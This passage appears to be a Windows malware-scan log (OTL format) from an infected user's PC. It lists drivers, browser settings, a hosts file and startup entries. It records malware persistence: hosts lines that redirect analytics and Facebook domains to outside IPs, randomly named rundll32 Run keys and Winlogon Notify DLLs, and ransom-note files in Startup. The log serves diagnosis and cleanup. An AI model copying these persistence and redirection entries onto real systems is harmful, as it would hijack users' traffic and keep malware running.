DRV:64bit: - [2013/08/22 05:37:14 | 000,029,696 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dmvsc.sys -- (dmvsc)
DRV:64bit: - [2013/08/22 05:36:43 | 000,087,040 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\netvsc63.sys -- (netvsc)
DRV:64bit: - [2013/08/22 05:36:25 | 000,016,384 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\NdisVirtualBus.sys -- (NdisVirtualBus)
DRV:64bit: - [2013/08/22 05:36:07 | 000,066,560 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mslldp.sys -- (MsLldp)
DRV:64bit: - [2013/08/22 05:35:42 | 000,103,424 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Stopped] -- C:\Windows\SysNative\drivers\Ndu.sys -- (Ndu)
DRV:64bit: - [2013/08/22 02:46:33 | 000,027,136 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\fxppm.sys -- (FxPPM)
DRV:64bit: - [2013/08/12 17:25:46 | 000,017,624 | ---- | M] (Windows ® Win 7 DDK provider) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bcmfn2.sys -- (bcmfn2)
DRV:64bit: - [2013/08/09 18:39:30 | 000,651,248 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStorAV.sys -- (iaStorAV)
DRV:64bit: - [2013/07/30 12:47:35 | 000,024,568 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSSi_GPIO.sys -- (iaLPSSi_GPIO)
DRV:64bit: - [2013/07/25 13:05:39 | 000,099,320 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSSi_I2C.sys -- (iaLPSSi_I2C)
DRV:64bit: - [2013/06/18 08:46:17 | 000,591,360 | ---- | M] (Realtek                                            ) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Rt630x64.sys -- (RTL8168)
DRV:64bit: - [2013/05/22 23:25:28 | 001,139,800 | ---- | M] (Symantec Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NISx64\1406000.01B\symefa64.sys -- (SymEFA)
DRV:64bit: - [2013/05/20 23:02:00 | 000,493,656 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NISx64\1406000.01B\symds64.sys -- (SymDS)
DRV:64bit: - [2013/05/15 23:02:14 | 000,796,760 | ---- | M] (Symantec Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NISx64\1406000.01B\srtsp64.sys -- (SRTSP)
DRV:64bit: - [2013/04/24 18:43:56 | 000,433,752 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NISx64\1406000.01B\symnets.sys -- (SymNetS)
DRV:64bit: - [2013/04/15 20:41:14 | 000,169,048 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NISx64\1406000.01B\ccsetx64.sys -- (ccSet_NIS)
DRV:64bit: - [2013/03/04 19:40:08 | 000,224,416 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NISx64\1406000.01B\ironx64.sys -- (SymIRON)
DRV:64bit: - [2013/03/04 19:21:35 | 000,036,952 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NISx64\1406000.01B\srtspx64.sys -- (SRTSPX)
DRV:64bit: - [2012/08/21 14:01:20 | 000,033,240 | ---- | M] (GEAR Software Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys -- (GEARAspiWDM)
DRV:64bit: - [2012/07/04 12:41:58 | 000,339,600 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\RtsPStor.sys -- (RSPCIESTOR)
DRV:64bit: - [2012/06/25 11:24:50 | 000,092,536 | ---- | M] (CyberLink) [Kernel | System | Stopped] -- C:\Windows\SysNative\drivers\CLVirtualDrive.sys -- (CLVirtualDrive)
DRV:64bit: - [2012/06/20 15:27:30 | 000,023,448 | R--- | M] (Symantec Corporation) [Kernel | Disabled | Stopped] -- C:\Windows\SysNative\drivers\NISx64\1406000.01B\symelam.sys -- (SymELAM)
DRV:64bit: - [2012/06/20 13:51:32 | 000,020,232 | ---- | M] (HandSet Incorporated) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\massfilter_hs.sys -- (massfilter_hs)
DRV:64bit: - [2012/03/31 00:49:08 | 000,056,448 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\usbfilter.sys -- (usbfilter)
DRV - [2015/02/21 08:13:00 | 000,013,192 | ---- | M] (Sysinternals) [Kernel | On_Demand | Stopped] -- C:\Users\Dorothy01\AppData\Local\Temp\NTFS.sys -- (BS1924802738)
DRV - [2014/09/12 16:11:19 | 001,586,904 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\Definitions\BASHDefs\20140912.003\BHDrvx64.sys -- (BHDrvx64)
DRV - [2014/09/09 09:00:55 | 000,487,216 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys -- (eeCtrl)
DRV - [2014/09/09 09:00:55 | 000,142,640 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys -- (EraserUtilRebootDrv)
DRV - [2014/09/01 21:58:46 | 002,137,304 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\Definitions\VirusDefs\20140920.001\ex64.sys -- (NAVEX15)
DRV - [2014/09/01 21:58:46 | 000,129,752 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\Definitions\VirusDefs\20140920.001\eng64.sys -- (NAVENG)
DRV - [2014/08/29 15:40:15 | 000,633,560 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\Definitions\IPSDefs\20140919.001\IDSviA64.sys -- (IDSVia64)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.msn.com/HPDSK13/1
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = Reg Error: Value error.
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Secondary Start Pages = Reg Error: Value error.
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes\{8E0E081D-FD81-46C2-AD92-3B939C17F151}: "URL" = http://www.amazon.co...s={searchTerms}
IE - HKLM\..\SearchScopes\{b7fca997-d0fb-4fe0-8afd-255e89cf9671}: "URL" = http://search.yahoo....psg&type=HPDTDF
 
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar = Preserve
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com/
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
IE - HKCU\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKCU\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...Box&FORM=IE8SRC
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
 
========== FireFox ==========
 
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=:  File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=11.31.2: C:\Program Files (x86)\Java\jre1.8.0_31\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=11.31.2: C:\Program Files (x86)\Java\jre1.8.0_31\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3502.0922: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3555.0308: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.26.9\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.26.9\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@WildTangent.com/GamesAppPresenceDetector,Version=1.0: C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll ()
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{BBDA0591-3099-440a-AA10-41764D9DB4DB}: C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\IPSFF [2014/07/23 11:01:38 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}: C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\coFFPlgn\ [2015/02/20 07:09:50 | 000,000,000 | ---D | M]
 
[2015/02/19 21:14:49 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2015/02/19 21:14:49 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
 
========== Chrome  ==========
 
CHR - plugin: Error reading preferences file
CHR - Extension: No name found = C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\
CHR - Extension: No name found = C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\
CHR - Extension: No name found = C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.4_0\
CHR - Extension: No name found = C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn\0.1.1.5023_0\
CHR - Extension: No name found = C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.7_0\
CHR - Extension: No name found = C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\
CHR - Extension: No name found = C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\
CHR - Extension: No name found = C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\iikflkcanblccfahdhdonehdalibjnif\1.0.5_0\
CHR - Extension: No name found = C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\
CHR - Extension: No name found = C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\
 
O1 HOSTS File: ([2015/02/21 03:31:16 | 000,001,509 | RHS- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O1 - Hosts: 127.0.0.1       localhost
O1 - Hosts: ::1             localhost
O1 - Hosts: 195.162.68.59 www.google-analytics.com.
O1 - Hosts: 195.162.68.59 google-analytics.com.
O1 - Hosts: 195.162.68.59 connect.facebook.net.
O1 - Hosts: 162.247.13.54 www.google-analytics.com.
O1 - Hosts: 162.247.13.54 google-analytics.com.
O1 - Hosts: 162.247.13.54 connect.facebook.net.
O1 - Hosts: 195.162.69.252 www.google-analytics.com.
O1 - Hosts: 195.162.69.252 google-analytics.com.
O1 - Hosts: 195.162.69.252 connect.facebook.net.
O2:64bit: - BHO: (no name) - {7F96F190-09C4-4BEC-B7FB-A9E26151EAB0}} - No CLSID value found.
O2:64bit: - BHO: (no name) - {AA58ED58-01DD-4d91-8333-CF10577473F7} - No CLSID value found.
O2 - BHO: (Norton Identity Protection) - {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton Internet Security\Engine\20.6.0.27\coieplg.dll (Symantec Corporation)
O2 - BHO: (Norton Vulnerability Protection) - {6D53EC84-6AAE-4787-AEEE-F4628F01010C} - C:\Program Files (x86)\Norton Internet Security\Engine\20.6.0.27\ips\ipsbho.dll (Symantec Corporation)
O2 - BHO: (Java™ Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_31\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (no name) - {7F96F190-09C4-4BEC-B7FB-A9E26151EAB0}} - No CLSID value found.
O2 - BHO: (Java™ Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_31\bin\jp2ssv.dll (Oracle Corporation)
O2 - BHO: (HP Network Check Helper) - {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard)
O3:64bit: - HKLM\..\Toolbar: (no name) - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - No CLSID value found.
O3:64bit: - HKLM\..\Toolbar: (no name) - Locked - No CLSID value found.
O3 - HKLM\..\Toolbar: (Norton Toolbar) - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine\20.6.0.27\coieplg.dll (Symantec Corporation)
O3 - HKLM\..\Toolbar: (no name) - Locked - No CLSID value found.
O4:64bit: - HKLM..\Run: [RTHDVCPL] C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe (Realtek Semiconductor)
O4 - HKLM..\Run: [AvastUI.exe] C:\Program Files\AVAST Software\Avast\AvastUI.exe (AVAST Software)
O4 - HKLM..\Run: [CLMLServer_For_P2G8] c:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe (CyberLink)
O4 - HKLM..\Run: [CLVirtualDrive] c:\Program Files (x86)\CyberLink\Power2Go8\VirtualDrive.exe (CyberLink Corp.)
O4 - HKLM..\Run: [CrashReportSaver] C:\Windows\Installer\{4E61FB7C-E89A-4510-ADC1-B38572ADB03D}\msiexec.exe (EFD Software)
O4 - HKLM..\Run: [StartCCC] C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe (Advanced Micro Devices, Inc.)
O4 - HKCU..\Run: [acikmao] rundll32 "C:\Users\Dorothy01\AppData\Local\acikmao.dll",acikmao File not found
O4 - HKCU..\Run: [Driver Support] C:\Program Files (x86)\Driver Support\Driver Support\DriverSupport.exe /applicationMode:systemTray /showWelcome:false File not found
O4 - Startup: C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.HTML ()
O4 - Startup: C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.PNG ()
O4 - Startup: C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.TXT ()
O4 - Startup: C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.URL ()
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableCursorSuppression = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: SoftwareSASGeneration = 1
O9 - Extra Button: @C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll,-103 - {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe (Hewlett-Packard)
O9 - Extra 'Tools' menuitem : @C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll,-102 - {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe (Hewlett-Packard)
O10:64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000007 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000007 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)
O1364bit: - gopher Prefix: missing
O13 - gopher Prefix: missing
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.254
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{0C5C3F02-879E-42E8-8113-9C0FA649DB90}: NameServer = 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{462105B1-AF78-47E3-AC0D-109F28027A93}: DhcpNameServer = 192.168.1.254
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{462105B1-AF78-47E3-AC0D-109F28027A93}: NameServer = 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D}: NameServer = 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{9B004C7D-7A34-4A9C-BEDB-5212A582FAB1}: DhcpNameServer = 192.168.1.254
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{9B004C7D-7A34-4A9C-BEDB-5212A582FAB1}: NameServer = 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{D24FA36B-6CD5-4603-8F72-73AC28D99F5B}: NameServer = 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
O18:64bit: - Protocol\Handler\wlpg - No CLSID value found
O20:64bit: - HKLM Winlogon: Shell - (explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\WINDOWS\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\WINDOWS\SysWow64\userinit.exe (Microsoft Corporation)
O20 - Winlogon\Notify\pckunie: DllName - (C:\Users\Dorothy01\AppData\Local\pckunie.dll) - C:\Users\Dorothy01\AppData\Local\pckunie.dll ()
O20 - Winlogon\Notify\pgkunge: DllName - (C:\Users\Dorothy01\AppData\Local\pgkunge.dll) - C:\Users\Dorothy01\AppData\Local\pgkunge.dll ()
O21:64bit: - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O30 - LSA: Security Packages - (livessp) -  File not found
O32 - HKLM CDRom: AutoRun - 1
O33 - MountPoints2\{5042c0a6-b247-11e4-bed4-089e013a632b}\Shell - "" = AutoRun
O33 - MountPoints2\{5042c0a6-b247-11e4-bed4-089e013a632b}\Shell\AutoRun\command - "" = "G:\AutoRun.exe" 
O34 - HKLM BootExecute: (autocheck autochk *)
O35:64bit: - HKLM\..comfile [open] -- "%1" %*
O35:64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:64bit: - HKLM\...com [@ = comfile] -- "%1" %*
O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
 
========== Files/Folders - Created Within 30 Days ==========
 
[2015/02/21 08:13:04 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\Microsoft
[2015/02/20 06:45:09 | 000,000,000 | ---D | C] -- C:\Users\Dorothy01\AppData\Local\CrashDumps
[2015/02/20 06:08:52 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\Java
[2015/02/20 06:07:45 | 000,000,000 | ---D | C] -- C:\ProgramData\RogueKiller
[2015/02/19 22:04:32 | 000,000,000 | ---D | C] -- C:\Users\Dorothy01\AppData\Roaming\AVAST Software
[2015/02/19 21:33:51 | 000,000,000 | ---D | C] -- C:\AdwCleaner
[2015/02/19 21:27:48 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVAST Software
[2015/02/19 21:27:15 | 000,364,512 | ---- | C] (AVAST Software) -- C:\WINDOWS\SysNative\aswBoot.exe
[2015/02/19 21:20:43 | 000,000,000 | ---D | C] -- C:\Program Files\Google
[2015/02/19 21:20:39 | 000,000,000 | ---D | C] -- C:\ProgramData\Google
[2015/02/19 21:20:09 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
[2015/02/19 21:18:08 | 000,000,000 | ---D | C] -- C:\Users\Dorothy01\AppData\Local\Google
[2015/02/19 21:18:08 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Google
[2015/02/19 21:17:51 | 001,050,432 | ---- | C] (AVAST Software) -- C:\WINDOWS\SysNative\drivers\aswsnx.sys
[2015/02/19 21:17:51 | 000,436,624 | ---- | C] (AVAST Software) -- C:\WINDOWS\SysNative\drivers\aswSP.sys
[2015/02/19 21:17:51 | 000,083,280 | ---- | C] (AVAST Software) -- C:\WINDOWS\SysNative\drivers\aswmonflt.sys
[2015/02/19 21:17:46 | 000,043,152 | ---- | C] (AVAST Software) -- C:\WINDOWS\avastSS.scr
[2015/02/19 21:15:57 | 000,000,000 | ---D | C] -- C:\Program Files\AVAST Software
[2015/02/19 21:15:30 | 000,000,000 | ---D | C] -- C:\ProgramData\AVAST Software
[2015/02/19 21:13:57 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Mozilla Firefox
[2015/02/18 16:53:03 | 000,129,752 | ---- | C] (Malwarebytes Corporation) -- C:\WINDOWS\SysNative\drivers\MBAMSwissArmy.sys
[2015/02/18 16:52:33 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
[2015/02/18 16:52:27 | 000,093,400 | ---- | C] (Malwarebytes Corporation) -- C:\WINDOWS\SysNative\drivers\mbamchameleon.sys
[2015/02/18 16:52:27 | 000,064,216 | ---- | C] (Malwarebytes Corporation) -- C:\WINDOWS\SysNative\drivers\mwac.sys
[2015/02/18 16:52:27 | 000,025,816 | ---- | C] (Malwarebytes Corporation) -- C:\WINDOWS\SysNative\drivers\mbam.sys
[2015/02/18 16:52:26 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Malwarebytes Anti-Malware
[2015/02/18 16:52:26 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes
[2015/02/18 16:49:06 | 000,000,000 | ---D | C] -- C:\Users\Dorothy01\AppData\Local\Programs
[2015/02/18 16:48:30 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
[2015/02/18 16:48:28 | 000,000,000 | ---D | C] -- C:\Program Files\CCleaner
[2015/02/18 16:39:38 | 000,000,000 | ---D | C] -- C:\WINDOWS\pss
[2015/02/11 17:53:23 | 000,175,808 | ---- | C] (ZTE Corporation) -- C:\WINDOWS\SysNative\drivers\zghsnet.sys
[2015/02/11 17:53:23 | 000,134,976 | ---- | C] (ZTE Corporation) -- C:\WINDOWS\SysNative\drivers\zghsser.sys
[2015/02/11 17:53:23 | 000,062,728 | ---- | C] (VIA Telecom) -- C:\WINDOWS\SysNative\drivers\viahsser.sys
[2015/02/11 17:53:23 | 000,032,136 | ---- | C] (Via Telecom, Inc.) -- C:\WINDOWS\SysNative\drivers\viahsets.sys
[2015/02/11 17:53:23 | 000,020,232 | ---- | C] (HandSet Incorporated) -- C:\WINDOWS\SysNative\drivers\massfilter_hs.sys
[2015/02/11 17:53:13 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ZTE Handset USB Driver
[2015/02/11 17:53:08 | 000,000,000 | ---D | C] -- C:\Program Files\ZTE_Handset_USB_Driver
[2015/01/24 16:45:15 | 000,000,000 | ---D | C] -- C:\Users\Dorothy01\AppData\Local\{294523ef-b8b6-59cc-fe37-7cd365b2a599}
[2011/07/11 21:06:59 | 000,212,304 | ---- | C] (Microsoft Corporation) -- C:\Users\Dorothy01\AppData\Roaming\BtvStack.dll
 
========== Files - Modified Within 30 Days ==========
 
[2015/02/21 18:39:41 | 001,041,788 | ---- | M] () -- C:\WINDOWS\SysNative\perfh009.dat
[2015/02/21 18:39:41 | 000,244,124 | ---- | M] () -- C:\WINDOWS\SysNative\perfc009.dat
[2015/02/21 18:39:41 | 000,006,428 | ---- | M] () -- C:\WINDOWS\SysNative\PerfStringBackup.INI
[2015/02/21 18:35:45 | 000,067,584 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2015/02/21 18:33:31 | 268,435,456 | -HS- | M] () -- C:\swapfile.sys
[2015/02/21 18:33:30 | 3070,296,064 | -HS- | M] () -- C:\hiberfil.sys
[2015/02/21 06:48:19 | 000,045,610 | ---- | M] () -- C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.PNG
[2015/02/21 06:48:19 | 000,008,630 | ---- | M] () -- C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.HTML
[2015/02/21 06:48:19 | 000,000,292 | ---- | M] () -- C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.URL
[2015/02/21 03:31:16 | 000,001,509 | RHS- | M] () -- C:\WINDOWS\SysNative\drivers\etc\hosts
